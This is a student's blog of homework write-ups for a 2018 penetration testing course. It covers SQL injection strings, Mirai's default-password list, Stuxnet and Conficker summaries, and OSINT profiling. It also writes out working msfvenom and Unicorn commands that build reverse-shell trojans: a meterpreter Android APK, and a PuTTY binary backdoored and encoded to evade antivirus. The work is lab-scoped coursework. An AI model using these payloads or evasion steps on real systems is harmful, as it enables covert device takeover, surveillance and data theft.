Penetration Testing course at Haaga-Helia, fall 2018
This course was taught by Tero Karvinen at Haaga-Helia University of Applied Sciences in the fall of 2018. The course is the first of its kind at the school, and aims to teach students some basic pentesting skills to use in future cyber security tasks.
DISCLAIMER: Penetration testing uses methods that, when used against the wrong targets, are highly illegal. The methods described here should not be used maliciously, and my descriptions of their are not meant to inpsire such use. Always define your scope precisely, and check local legislation.
During this course, all targets are either self-hosted or purpose-built target machines.
- Kokeile valitsemaasi OWASP 10 hyökkäystä omalle koneellesi. Tässä harjoituksessa saa käyttää vain omalle, paikalliselle koneelle asennettuja harjoitusmaaleja.
Vinkkejä: Voit etsiä jonkin valmiin haavoittuvan ohjelmiston, asentaa sen ja kokeilla valmista hyökkäystä suoraan spoilerista/ohjetekstistä. Tarkoitus on siirtyä hyökkäyksistä puhumisesta niiden kokeilemiseen. Jos osaat koodata, voit tehdä haavoittuvan ohjelman myös itse. Tämä näytti aika haavoittuvalta ja on helppo asentaa: Install Metasploitable 3 – Vulnerable Target Computer. Vinkkejä: Teron haavoittuva ohjelma: Vulnerable Super Secure Password Recover – SQL Injection Example. Kaikkein helpoin vaihtoehto on asentaa Metasploitable 3 ja vilkaista payroll_app.php -ohjelmaa.- Vapaaehtoinen: Kokeile useita OWASP 10 hyökkäyksiä omalla koneellasi olevaan harjoitusmaaliin. Montako saa toteutettua käytännössä?
I started the first exercise by installing Metasploitable3 on my laptop (Host OS is Xubuntu 18.04). I checked the functionality first with curl and then with Firefox.
Since the hint was pretty obvious, I got in by making a simple SQL injection ' or '1'='1' or 'foo. This presented me with a full listing of saved usernames, actual names and salaries (who thought paying droids was a good idea?).
- Tiedustele aktiivisesti HackTheBoxin verkko. Voit käyttää esimerkiksi porttiskannereita, metasploittia, selainta, curl -I, nc ja muita osaamiasi työkaluja. Raportoi. Laita HackTheBoxin ratkaisut yksinkertaisen salasanan taakse, ei julkiseen nettiin. Salasanan voit antaa opettajalle Moodleen ja kurssikavereille, ei julkiseen nettiin.
- Tee WebGoatista kolme tehtävää. Asenna WebGoat tarvittaessa. Ratkaisut saa julkaista normaalisti koko Internetille. Vinkki: edellisen kerran läksyjen raporteissa tällä sivulla on helppoja asennusohjeita WebGoatille.
- Vapaaehtoinen: Ratko lisää WebGoatin tehtäviä.
- Vapaaehtoinen, vaikea: Jos osaat, korkaa jokin maalikone HackTheBoxista. Muista sallitut rajat eli scope. Apupyörinä voit käyttää HackTheBoxin weppiliittymästä löytyvää konelistaa vaikeustason mukaan järjestettynä.
My solutions to Hack the Box assignments are not listed here to adhere to their policy of no public sharing.
My solutions can be found here. Password provided by request!
I downloaded the two files, WebGoat and WebWolf, from https://github.com/WebGoat/WebGoat/releases and started them up with the command java --add-modules java.xml.bind -jar webgoat-server-8.0.0.M21.jar and java --add-modules java.xml.bind -jar webwolf-8.0.0.M21.jar as my Java version (java -version) was 10.0.2 and thus greater than 9. After this I accessed WebGoat by navigating to http://localhost:8080/WebGoat, which directed me to the login page. The login for WebWolf can be found at http://localhost:9090/login and uses the same account name and password as WebGoat.
The HTTP Basics assignment is solved simply by checking the source code of the page, it contains the magic number in clear text. This could be avoided by using server-side scripts instead of writing them in the HTML.
The SQL injection (basic) is quite easy, the form dumps the entire database with a correctly formatted string. In my case the string used was Smith' or 1=1 --.
In SQL injection (advanced), pulling the other table can be done by entering Smith';select * from user_system_data;--. This shows the entire table, including Daves password passW0rD (Nice one, Dave!).
I owned two target machines! I started with what seems to be the easiest target, Jerry. Then I moved on the more complicated Poison. I solved two of the Crypto challenges, "Sick Teacher" and "Classic, yet complicated". More info in the password-protected file!
- Kokeile haavoittuvuusskanneria (vulnerability scanner). Käytä jotain muuta kuin tunnilla kokeiltua niktoa. Esim. openvas, w3af…
- Haavoittuvuusskannaa 5 konetta HackTheBoxin verkosta. Käytä kahta skanneria, esimerkiksi niktoa ja edellisessä kohdassa valitsemaasi skanneria. Analysoi tulokset. Mitkä palvelut vaikuttavat helpoimmilta kohteilta aloittaa hyökkäys? Jos haluat, voit tuoda tulokset metasploit:iin db_import -komennolla.
- Silmäile Mirai-haittaohjelman lähdekoodia. Etsi lista salasanoista, joita Mirai käyttää. (Tämän kohdan voi tehdä pelkästä lähdekoodista. Mitään ei tarvitse kääntää eikä ajaa. Binäärimuotoiset virukset ja madot voivat levitä, joten niiden käsittely vaatii erityisjärjestelyjä.)
- Yritä korkata joku kone HackTheBoxin verkosta. Maaliin asti ei tarvitse päästä, mutta raportoi mitä kokeilit ja mitä johtolankoja jäi vielä tutkittavaksi.Voit apupyörinä katsoa listasta, mitkä koneet on arvioitu helpoiksi.
- Vapaaehtoinen: Miten OWASP WebGoat:n Authentication Bypass -hyökkäys toimii? Voit lukea OWASP 10 mitä tämä hyökkäys tarkoittaa ja sitten ratkaista tehtävän WebGoatista. Lopuksi voit katsoa WebGoatin lähdekoodista “string fishing” -tekniikalla, miten koodi toimii.
Detailed in the password-protected file!
The Mirai source code is a really interesting thing to study. There's a wide variety of skill levels displayed, ranging from naming test strings "fuck.the.police.com" or "memes" all the way to adding specific exceptions for Huawei's Home Gateway line of devices. The source code also specifies a "Don't touch" list of IP ranges, containing all the local address spaces but also targets such as the US Department of Defence. The code also contains portions dedicated to killing off other malware, so that Mirai can have sole control of the compromised devices resources.
The dictionary used for brute force attacks is found in mirai/bot/scanner.c and contains the following:
| user | pass |
|---|---|
| root | xc3511 |
| root | vizxv |
| root | admin |
| admin | admin |
| root | 888888 |
| root | xmhdipc |
| root | default |
| root | juantech |
| root | 123456 |
| root | 54321 |
| support | support |
| root | |
| admin | password |
| root | root |
| root | 12345 |
| user | user |
| admin | |
| root | pass |
| admin | admin1234 |
| root | 1111 |
| admin | smcadmin |
| admin | 1111 |
| root | 666666 |
| root | password |
| root | 1234 |
| root | klv123 |
| Administrator | admin |
| service | service |
| supervisor | supervisor |
| guest | guest |
| guest | 12345 |
| guest | 12345 |
| admin1 | password |
| administrator | 1234 |
| 666666 | 666666 |
| 888888 | 888888 |
| ubnt | ubnt |
| root | klv1234 |
| root | Zte521 |
| root | hi3518 |
| root | jvbzd |
| root | anko |
| root | zlxx. |
| root | 7ujMko0vizxv |
| root | 7ujMko0admin |
| root | system |
| root | ikwb |
| root | dreambox |
| root | user |
| root | realtek |
| root | 00000000 |
| admin | 1111111 |
| admin | 1234 |
| admin | 12345 |
| admin | 54321 |
| admin | 123456 |
| admin | 7ujMko0admin |
| admin | 1234 |
| admin | pass |
| admin | meinsm |
| tech | tech |
| mother | fucker |
Detailed in the password-protected file!
- Korkkaa Poison. Jos et pääse root shelliin asti, kuvaile, mihin pääsit ja mitä johtolankoja jäi tutkimatta.
- CTF walktrough. Katso Youtubesta jokin CTF walktrough (muu kuin HackTheBox). Mitä opit, mitä ideoita sait? Kokeile vähintään kolmea itsellesi uutta työkalua, joita opit videosta.
- Stuxnet. Lue artikkeli Stuxnetista, esim. Symantec tai Langer. Voit hakea ‘stuxnet analysis’. 1) Miten Stuxnet murtautui koneille? Yleisluontoinen vastaus (mikä hyökkäys millekin käyttöjärjestelmälle mihin komponenttiin) riittää, koska nämä hyökkäykset ovat jo vanhentuneet. 2) Miten ohjaus (command and control, C2) toimi? 3) Miten Stuxnet ylitti ilmaraon (air gap)?
I decided to take a look at the Mr. Robot CTF, since it seems quite popular among tutorial-type YouTube channels. The walkthrough I picked is made by JackkTutorials. The maker seems enthusiastic, but far from professional. The video contains quick examples of a few tools that are new to me:
| Tool | Usage |
|---|---|
| Zenmap | Graphical interface for Nmap |
| Uniscan | Automated scanning of web sites |
| Hash Identifier | Identifies hash type from string |
| WP-Scan | Scanning of WordPress sites |
| THC Hydra | Bruteforcing passwords & usernames |
The video left me with some questions so I watched HackerSploits walkthrough as well. HackerSploits walkthrough goes through pretty much the same steps, but in more detail and with constant explanations.
I tested the tools on some of HTB's machines, details are in the password-protected file!
I'd heard of Stuxnet before, and knew on a basic level what it did and what it aimed to accomplish. I did some "light" reading to deepen my knowledge: Langner for a general understanding and Symantec for more details. The current understanding (or unconfirmed allegation) is that Stuxnet was created by US and Israel to cripple the Iranian nuclear program. The worm was highly tailored, and aimed at a very strictly defined group of targets (Windows systems running SCADA controller software, or ultimately, the logic controllers of a specific type of centrifuge used in uranium enrichment).
Stuxnet will only run on the following operating systems:
- Win2K
- WinXP
- Windows 2003
- Vista
- Windows Server 2008
- Windows 7
- Windows Server 2008 R2
If the operating system is Windows Vista, Windows 7, or Windows Server 2008 R2 the CVE-2010-2568 Task Scheduler vulnerability is exploited. The vulnerability allowed infected code to be automatically run off booby trapped USB sticks. If the operating system is Windows XP or Windows 2000 the Windows Win32k.sys Local Privilege Escalation vulnerability (MS10-073) is exploited.
If exploited, both of these vulnerabilities result in the main .dll file running as a new process, either within the csrss.exe process in the case of the win32k.sys vulnerability or as a new task with Adminstrator rights in the case of the Task Scheduler vulnerability.
The command and control (C2) part of the worm does the following:
- Checks network connection by accessing msn.com or windowsupdate.com
- Reports back to defined servers with some details of the infected system (OS version, IP address, host and domain names...)
- Most importantly: Is the machine running the targeted ICS programming software, Siemens Step7 or WinCC
- Update to most recent version
- Retrieve payloads from the control servers based on sent information
All communications are hidden by XOR-encrypting the payload, and sent via injected processes either in existing Internet Explorer sessions or new ones.
The Stuxnet worm has a few different ways to spread:
- Scanning for removable drives and infecting them with copies of itself (crossing total air gaps)
- Infecting Step 7 project files, autoexecute upon opening (also possibly crossing air gaps)
- Infecting network shares
- A few other Windows vulnerabilities, allowing code execution
Stuxnet also runs an RPC server-client architecture, sharing the most recent version within the network instead of fecthing it to each system.
- Tee troijan hevosia, vähintään kaksi erilaista. Voit tehdä esimerkiksi saastuneen asennusohjelman, dokumentteja joissa on vihamielisiä makroja sekä älypuhelimen apsin. Nimeä ohjelmat siten, että haitallinen tarkoitus ilmenee MALWARE-installer.exe. Vihamielisenä hyötykuormana voi olla esimerkiksi meterpreter. Älä tee itsestään leviäviä ohjelmia. Voit käyttää troijan hevosen tekoon esim. setoolkit, msfvenom.
- Mitä uusia keksintöjä Confickerissa esiteltiin? Lue jokin artikkeli Confickerista. ‘conficker analysis’ on hyvä hakusana. Kiinnitä huomiosi C2:n.
- Blogeja. Etsi Krebsin tai Schneierin blogeista ideoita pentestiin. Näissä blogeissa on paljon turvallisuuteen liittyviä aiheita, tee erityisesti huomioita tunkeutumistestaukseen liittyen.
- Safarionline. Opettele ja testaa jokin uusi Pentesting-tekniikka kirjasta tai videosta, jonka löydät Safarionlinesta.
For my first Trojan I chose to create a meterpreter backdoor for Android. I created an .apk file with MSFVenom, using the command msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.228 LPORT=4444 > backdoor.apk. I had to settle for a simple, obvious backdoor because for some reason my Kali VM refused to cooperate with the apktool program, resulting in errors while trying to inject the payload to another file. I was trying to compromise a custom camera APK, which brings the camera application from OnePlus 5 to OnePlus 3 (one of which I had lying around waiting for a use). The command msfvenom -x oneplus5_camera.apk -p android/meterpreter/reverse_tcp LHOST=10.0.0.228 LPORT=4444 -o BACKDOORED_oneplus5_camera.apk should have resulted in a corrupted APK that would have stealthily run in the background while taking pictures.
I uploaded my newly-created backdoor.apk to my old OnePlus 3 via USB, after first excluding it from my antivirus software (which kept quarantining it as soon as WinSCP finished moving it from my VM). I installed my backdoor from the file manager, after which a new icon, "MainActivity" appeared in the app drawer. I started a handler on my Kali VM (which is on the same network as my phone), and ran the application on my phone.
Here are some shots of the install process:
The meterpreter shell has some interesting options to explore: dumping of contacts, browsing the file system and viewing the camera feeds were the first things I tested. The shell also has a command for hiding the applications icon from the app drawer, after which it can only be found via the app options menu. Sadly, geolocating the phone didn't work since the phone has no sim card.
Here's a quick snap showing my ceiling, as the phone was sitting on my table:
For my second Trojan I inserted Meterpreter into the widely used Putty. I followed Pekka's instructions (files hidden from public access due to sensitive information) to inject malware into another executable. I started by downloading a 32-bit version of Putty (using a 64-bit version causes the following commands to fail!) on my Kali machine. I used the following command to create a basic backdoor:
msfvenom -a x86 --platform windows -x `putty.exe -k -p windows/meterpreter/reverse_tcp \
LHOST=[[server_ip]] LPORT=1404 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o BACKDOOR_putty.exe
The file created this way is easily readable, and a better way is to cover your tracks by encoding the file a couple of times:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp \
LHOST=[[server_ip]] LPORT=1404 -f raw -e x86/shikata_ga_nai -i 4 -k | \
msfvenom -a x86 --platform windows -e x86/countdown -i 5 -f raw -k | \
msfvenom -a x86 --platform windows -k -x putty.exe -b "\x00" -f exe -o BACKDOOR_putty.exe
I prepared for incoming connections on my Kali machine by starting a Metasploit handler, configured to listen for the correct payload on the correct port and interface. I moved the corrupted executable by using WinSCP on the target Windows 10 VM, and received virus detection notifications immediately. Windows Defender spotted the Meterpreter code before the entire file was even transferred, so I turned off Defender and moved the file again. After this, running BACKDOOR_putty.exe started a perfectly normal-looking, normally working instance of Putty on the targeted Win10 VM. As soon as the program was opened, the reverse TCP connection was open and provided full control to the Kali handler.
Conficker is a computer worm, exploiting one of the most severe Windows vulnerabilities ever discovered. The MS08-067 vulnerability could be used to execute code remotely via specially crafted RPC requests. The intent of the worm seemed to be mainly disabling security measures and scouting networks, possibly to make way for other attacks. In its height in early 2009, an estimated 9 to 15 million computers were infected with one of the Conficker variants.
Conficker was ahead of its time in terms of self-protection, with some of the technologies never seen before.
- "spaghetti code" containing both direct and indirect jumps within the code blocks, slowing down reverse engineering
- general obfuscation methods all over the code, either via Windows' own Cryptographic Provider component or using time-seeded sequences
- 4096-bit RSA keys being used to confirm updated versions were indeed from the original author (encryption methods were updated on new versions of Conficker pretty much as fast as they were available)
- verification of downloaded data based on the RSA key
- checks for virtual environment, shutting down the worm incase it was not running on a physical machine
- modifications to the access control list to prevent anyone without SYSTEM rights from reading or modifying the file
- locking the DLL file on disk, preventing other processes from accessing it
- shutting down several security processes within Windows to provide free reign for Conficker
- preventing access to security-oriented web sites (Symantec, McAfee and others)
The communication structure within Conficker used a clever algorithm, which built a list of 250 domains to contact every day. The author(s) could use this same algorithm to determine a domain to register, which would then get contacted for updates. Later versions of the worm created 50 000 random domains per day, out of which 500 were selected. This change was made to make it impossible for the "good guys" to register all the domains to prevent updates.
The Conficker worm also contained a p2p architecture, allowing infected machines to contact each other for updates. The client-server architecture relied on port numbers calculated based on the host IP address, with the current week changing the algorithm. This method of calculating one port per client allows Conficker to lower the amount of traffic dramatically, reducing the risk of being spotted by intrusion detection systems.
Sources:
http://www.blackhat.com/presentations/bh-usa-09/HYPPONEN/BHUSA09-Hypponen-ConfickerMystery-PAPER.pdf
https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf
https://www.sans.org/security-resources/malwarefaq/conficker-worm
Compromising a browser extension
This might be an interesting path to explore. Obviusly doing this to an existing addon would be harmful, unethical and likely illegal, but creating your own malicious addon, for example a "company security addon", might be doable.
Using hacked IoT devices to disrupt the power grid
At least to me, this is a completely new way of using hacked IoT devices. So far, botnets like Mirai have been used to cause massive digital disruptions, but this kind of a vulnerability could be used to target other systems connected to the IoT devices.
I read the book Advanced Infrastructure Penetration Testing and found a nice, simple script for enumeration on a Linux machine. The LinEnum script has 60+ checks for weak configurations, bad practices etc. The script prints gathered information in the terminal while running, and can also save relevant files in a specified folder.
I used the command ./LinEnum.sh -s -e /tmp/ -t, where:
- -s enables asking for current users password, to check for sudo capabilities
- -e specifies the output directory
- -t enables thorough checks
Here's a part of the terminal output:
### SYSTEM ##############################################
[-] Kernel information:
Linux jurpo-pc 4.15.0-29-generic #31~16.04.1-Ubuntu SMP Wed Jul 18 08:54:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
[-] Kernel information (continued):
Linux version 4.15.0-29-generic (buildd@lcy01-amd64-024) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10)) #31~16.04.1-Ubuntu SMP Wed Jul 18 08:54:04 UTC 2018
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.5 LTS"
NAME="Ubuntu"
VERSION="16.04.5 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.5 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
One part of the script is listing all ports that have services listening:
[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 10.0.0.218:22 10.0.0.204:54169 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 29184 0 127.0.1.1:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 17664 0 0.0.0.0:51284 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp 0 0 0.0.0.0:47836 0.0.0.0:* -
udp 21504 0 0.0.0.0:5353 0.0.0.0:* -
udp6 15360 0 :::5353 :::* -
udp6 0 0 :::38634 :::* -
And here's the full list of files included in the output:
.
├── conf-files
│ └── etc
│ ├── adduser.conf
│ ├── appstream.conf
│ ├── brltty.conf
│ ├── ca-certificates.conf
│ ├── debconf.conf
│ ├── deluser.conf
│ ├── fuse.conf
│ ├── fwupd.conf
│ ├── gai.conf
│ ├── hdparm.conf
│ ├── host.conf
│ ├── insserv.conf
│ ├── inxi.conf
│ ├── kernel-img.conf
│ ├── kerneloops.conf
│ ├── ld.so.conf
│ ├── libao.conf
│ ├── libaudit.conf
│ ├── logrotate.conf
│ ├── ltrace.conf
│ ├── mke2fs.conf
│ ├── nsswitch.conf
│ ├── pam.conf
│ ├── pnm2ppa.conf
│ ├── popularity-contest.conf
│ ├── rsyslog.conf
│ ├── sensors3.conf
│ ├── sysctl.conf
│ ├── ucf.conf
│ ├── updatedb.conf
│ └── usb_modeswitch.conf
├── etc-export
│ ├── login.defs
│ └── passwd
├── files_with_capabilities
│ ├── arping
│ ├── gnome-keyring-daemon
│ ├── gst-ptp-helper
│ ├── mtr
│ ├── systemd-detect-virt
│ └── traceroute6.iputils
├── guid-files
│ ├── bsd-write
│ ├── chage
│ ├── crontab
│ ├── expiry
│ ├── gnome-pty-helper
│ ├── mlocate
│ ├── pam_extrausers_chkpwd
│ ├── snap-confine
│ ├── ssh-agent
│ ├── unix_chkpwd
│ ├── utempter
│ ├── wall
│ └── Xorg.wrap
├── ps-export
│ ├── bin
│ │ └── sh
│ ├── lib
│ │ └── systemd
│ │ ├── systemd
│ │ ├── systemd-journald
│ │ ├── systemd-logind
│ │ ├── systemd-timesyncd
│ │ └── systemd-udevd
│ ├── sbin
│ │ ├── agetty
│ │ ├── dhclient
│ │ ├── init
│ │ └── upstart
│ └── usr
│ ├── bin
│ │ ├── dbus-daemon
│ │ ├── pulseaudio
│ │ ├── python3
│ │ ├── whoopsie
│ │ └── xfce4-terminal
│ ├── lib
│ │ ├── accountsservice
│ │ │ └── accounts-daemon
│ │ ├── at-spi2-core
│ │ │ ├── at-spi2-registryd
│ │ │ └── at-spi-bus-launcher
│ │ ├── bluetooth
│ │ │ └── obexd
│ │ ├── dconf
│ │ │ └── dconf-service
│ │ ├── gvfs
│ │ │ ├── gvfs-afc-volume-monitor
│ │ │ ├── gvfsd
│ │ │ ├── gvfsd-fuse
│ │ │ ├── gvfsd-metadata
│ │ │ ├── gvfsd-trash
│ │ │ ├── gvfs-goa-volume-monitor
│ │ │ ├── gvfs-gphoto2-volume-monitor
│ │ │ ├── gvfs-mtp-volume-monitor
│ │ │ └── gvfs-udisks2-volume-monitor
│ │ ├── policykit-1
│ │ │ └── polkitd
│ │ ├── policykit-1-gnome
│ │ │ └── polkit-gnome-authentication-agent-1
│ │ ├── rtkit
│ │ │ └── rtkit-daemon
│ │ ├── snapd
│ │ │ └── snapd
│ │ ├── udisks2
│ │ │ └── udisksd
│ │ ├── upower
│ │ │ └── upowerd
│ │ ├── x86_64-linux-gnu
│ │ │ ├── indicator-application
│ │ │ │ └── indicator-application-service
│ │ │ ├── indicator-messages
│ │ │ │ └── indicator-messages-service
│ │ │ ├── indicator-sound
│ │ │ │ └── indicator-sound-service
│ │ │ ├── tumbler-1
│ │ │ │ └── tumblerd
│ │ │ └── xfce4
│ │ │ ├── notifyd
│ │ │ │ └── xfce4-notifyd
│ │ │ ├── panel
│ │ │ │ ├── wrapper-1.0
│ │ │ │ └── wrapper-2.0
│ │ │ └── xfconf
│ │ │ └── xfconfd
│ │ └── xorg
│ │ └── Xorg
│ └── sbin
│ ├── acpid
│ ├── anacron
│ ├── cron
│ ├── cups-browsed
│ ├── cupsd
│ ├── dnsmasq
│ ├── lightdm
│ ├── NetworkManager
│ └── rsyslogd
├── suid-files
│ ├── chfn
│ ├── chsh
│ ├── dbus-daemon-launch-helper
│ ├── dmcrypt-get-device
│ ├── fusermount
│ ├── gpasswd
│ ├── mount
│ ├── newgrp
│ ├── ntfs-3g
│ ├── passwd
│ ├── ping
│ ├── ping6
│ ├── pkexec
│ ├── polkit-agent-helper-1
│ ├── pppd
│ ├── snap-confine
│ ├── ssh-keysign
│ ├── su
│ ├── sudo
│ ├── umount
│ └── Xorg.wrap
└── wr-files
└── home
└── jurpo1
└── LinEnum.sh
- Hae Google Scholarlista tuore (alle 1-2 v) artikkeli, joka liittyy kurssin aiheeseen. Sopivia ovat vertaisarvioidut (peer-reviewed) artikkelit (journal articles) tai konfferenssipaperit (conference papers, ovat hieman alempaa tasoa kuin journal artikkelit). Minkä käytännön pentestiin sovellettavan asian opit artikkelista?
- Tee Google Scholar -haku kiinnostavasta aiheesta, jota haluat seurata. Mitä 5 tuoreinta tai viitatuinta artikkelia kertovat? Voit silmäillä artikkelit, ei tarvitse tiivistää niitä kattavasti. Tilaa haku omaan sähköpostiisi (alerts). Näin pysyt kärryillä oman alasi uudesta tieteellisestä tutkimuksesta – ehkä alue on hallussa jo opinnäytettä aloittaessa.
- Paketoi troijan hevonen itse. Voit tehdä asennuksen esimerkiksi inno setup -ohjelmalla. Voit kokeilla myös pakata samaan asennukseen vihamielisen ohjelman sekä normaalin ohjelman – näin et joudu muokkaamaan normaalin ohjelman binääriä. Nimeä ohjelmat siten, että haitallinen tarkoitus ilmenee MALWARE-installer.exe. Älä tee itsestään leviäviä ohjelmia.
- OSINT. Mistä ja millä tekniikoilla voit hakea ihmisistä tietoa avoimista lähteistä? Voit myös kokeilla sovelluksia, esim. maltego (suljettu) tai recon-ng (vapaa); sekä weppisivuja (esim. inteltechniques.com) ja oppaita (esim email). Voit hyödyntää myös offline-lähteitä. (Tämä kohta käsittelee tekniikoita, työkaluja ja weppisivuja – älä laita tähän parisi tietoja)
- Hae paristasi tietoa avoimista lähteistä. Pyri laatimaan kattava profiili henkilöstä: historia, kiinnostuksen kohteen, poliittiset mielipiteet, lähipiiri, taloudellinen tilanne, asuinpaikka… Älä julkaise tuloksia edes anonymisoituna, ei edes salasanan takana, äläkä kerro niistä ulkopuolisille hauskoja anekdootteja. Anna tulokset parillesi (sille, josta tiedot kertovat). Kysy pariltasi etukäteen, mistä tiedoista voimme keskustella tunnilla ja millä tarkkuudella. Käytä vain laillisia tekniikoita ja julkisia lähteitä. Tässä tehtävässä ei saa murtautua mihinkään, eikä esiintyä toisena henkilönä. Ole asiakkaan (parisi) luottamuksen arvoinen – myös pentest-asiakkaasi edellyttävät luottamuksellisuutta.
- Vapaaehtoinen: Koodaa oma troijan hevonen. Se voi esimerkiksi siirtää (exfiltrate) luottamuksellisia tiedostoja (selaimen salasanat, salaiset avaimet), nauhoittaa näppäimistöä (laukaisee todennäköisesti virustutkan/IDS:n) tai asentaa salaa lisää ohjelmia.
I browsed around for ages, looking for peer-reviewed publications or conference papers that both held some new, interesting information and were published in the last two years. In the end, I chose this conference paper about WebMTD, which is a solution for mitigating the effects of XSS attacks and other forms of code injection.
The acronym MTD stands for "moving target defense", which in this context means randomizing parts of system configuration, leading to slower attack progression. The WebMTD solution relies on what is known as TOC-TOU, or time of check to time of use flaw. In practice, an attacker studies the system configuration, designs their malicious code based on the known configuration before uploading (or otherwise injecting) the code. The flaw is born from the time between the design and implementation, during which the code may become unusable due to changes in the target configuration. In a way, this method uses beneficial code injection to prevent malicious code injection.
For a penetration tester, the key takeaway from this paper seems to be the need for continued surveillance, finding the changing code blocks and the pattern which they follow, in order to avoid detection and/or failed attacks. Relying on a single scan (while obviously the safest option) should be avoided, should there be a chance for several scans over a period of time.
I've been interested in "wardriving" for a while now. The term wardriving is used to describe the act of mapping out WiFi networks by moving around an area by, primarily, driving. Wardriving (or warwalking) is an effective way to determine the physical location of access points and the networks they broadcast. There are useful ways of utilizing wardriving in a penetration testing setting, mostly to form a better understanding of a large-scale target network. Vulnerable access points also provide excellent opportunities for lateral expansion inside a network.
The five most cited articles are from 2004-2010, and mostly cover the base concept of wardriving. The most recent of the five, from 2010, describes other sensor-based cell phone localization methods that can be used to map out a targets movement and habits. This article shows how the concept is largely obsolete, thanks to new devices having an array of sensors that can be "easily" exploited to form a better understanding of a big picture.
Browsing more recent articles, however, gives some insight to the more modern utilization of wardriving. The most recent articles available on the subject seem to center on wardriving and its impact on developing countries and areas, where internet connectivity is implemented with a tight schedule and a low budget. This project report from 2017 describes a war driving study completed in the Central Business District of Nairobi, Kenya. The wardrive revealed 2333 access points in a relatively small area, out of which 398 used either WEP or no encryption at all.
Another technique described in some of the articles is "crowdsourced war driving" where regular mobile devices (smartphones, laptops) of a group of people are used, either with their consent or without. A hacker might target an organisations network to infect the devices of those using it, and then use those devices to gain even more information on the surrounding area. Modern war driving technologies (such as the Wardriving applicatoon for Android) can also be used for indoor location mapping by using signal strength and known or approximate location of access points.
I packed a backdoored .exe file in a Inno Setup installer with a normal, vanilla putty.exe. A normal user might not now Putty doesn't need installing, so the decoy installer might look completely normal. The installer could also be configured to place my backdoored .exe in the startup folder, which would mean it runs on every startup. For now, the malware is not obfuscated or encrypted well enough, which means it is picked up by Windows Defender instantly. I used the built-in example files from Inno Setup to gain a basic understanding of the configuration syntax, and got my installer working after a few attempts.
A great way to start collecting intelligence is some good old-fashioned cyber-stalking. For our OSINT assignent I started with what I knew, and started working outwards from there.
Some of the paths I followed:
- Continuous Google searches along the way, filling in with new info
- Known Github username from assignments
- Search for the username on
knowem.com, which tries to register the username on 500+ sites. Failed tries usually mean the username is already taken, possibly by the same person. - Search for more information on things found in the Github assignments: Computer names, filenames, possible real IP addresses or other information
- Form a profile from revealed information, might reveal other possible aliases
- Check Github repositories for mistakenly uploaded information (username, email, IP address/domain)
- Search for the username on
- Known name, school and probably hometown (one in the Helsinki metropolitan area)
- Search for phone number, address (Fonecta)
- Search for information inside school systems (search for student number to find public folder)
- Search social media accounts
- Find interests, might reveal other sites with less security
- Try to find connections, friends with weaker privacy settings might reveal more information
a) Tee troijalainen Unicornilla ohjeen mukaan. (Vinkki: katso Tatun raporttia)
b) Asenna oma, itsellesi uusi harjoitusmaali. Voit hakea maalikoneen Vulnhubista. Murtaudu koneelle, katso walktroughsta vinkki, jos jäät jumiin.
c) Google Project Zero. Löydätkö tekniikoita, joita voi hyödyntää pentestissä? (Ei tarvitse toistaa haastavia assembler-temppuja)
I started by cloning the Unicorn Git repository and running the script for creating attack files: ./unicorn.py windows/meterpreter/reverse_https 10.0.2.15 8092, where I chose an appropriate payload and set the Kali hosts IP and port. The script generates an automated setup file for metasploit, unicorn.rc, which can be run with the command msfconsole -r unicorn.rc, which sets up the handler and moves it to the background. After this, the attack file powershell_attack.txt can be run on the target machines Powershell, which instantly closes the Powershell window and forms the backdoor connection in the background. A few seconds later the handler forms the connection and informs the user of this. The background sessions can be listed with the command sessions within msfconsole, after which the new session can be selected with sessions [session_number. The listing reveals the compromised user account and the targets hostname/IP address.
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows IE8WIN7\IEUser @ IE8WIN7 10.0.2.15:8096 -> 10.0.2.6:49188 (10.0.2.6)
I chose VulnHubs "Blacklight" CTF challenge for this assignment. This box is only rated as a beginner level challenge, but I was a bit pressed for time. I had a lot of issues setting up a working environment for this, as my Kali VM ran out of disk space and resizing encrypted virtual hard disks is a lot harder than it should be. The Vulnhub images didn't get an IP address from my DHCP server, so I had to run both the target and a Kali VM in Virtualbox on my main workstation.
Before I could study the machine, I had to find it. I struggled for a bit before realizing my VPN and LAN settings were preventing the VM's from seeing each other. I resorted in creating a new NAT network for them within Virtualbox, with the given default network 10.0.2.0/24. After booting up the VM's, I did initial setup on my Kali machine (updates, user account, msfdb init etc) and did a quick network scan, db_nmap -A -vvv 10.0.2.0/24.
After finding my target machine at 10.0.2.4 I did some more thorough scans with Nmap and Nikto. Initially, the only open port appeared to be 80/tcp, and accessing the IP address with a browser revealed a simple front page for the machine. The page contained a clue, "You are already close to the first flag. The web is the way.". This prompted me to do some scanning with Dirbuster, dirb, OWASP ZAP and Sparta (I've found in previous assignments that similar tools often yield different results).
The aforementioned tools raised one vector above all others: the robots.txt file on the web server. This has been a point of failure in a couple of the previous assignments.
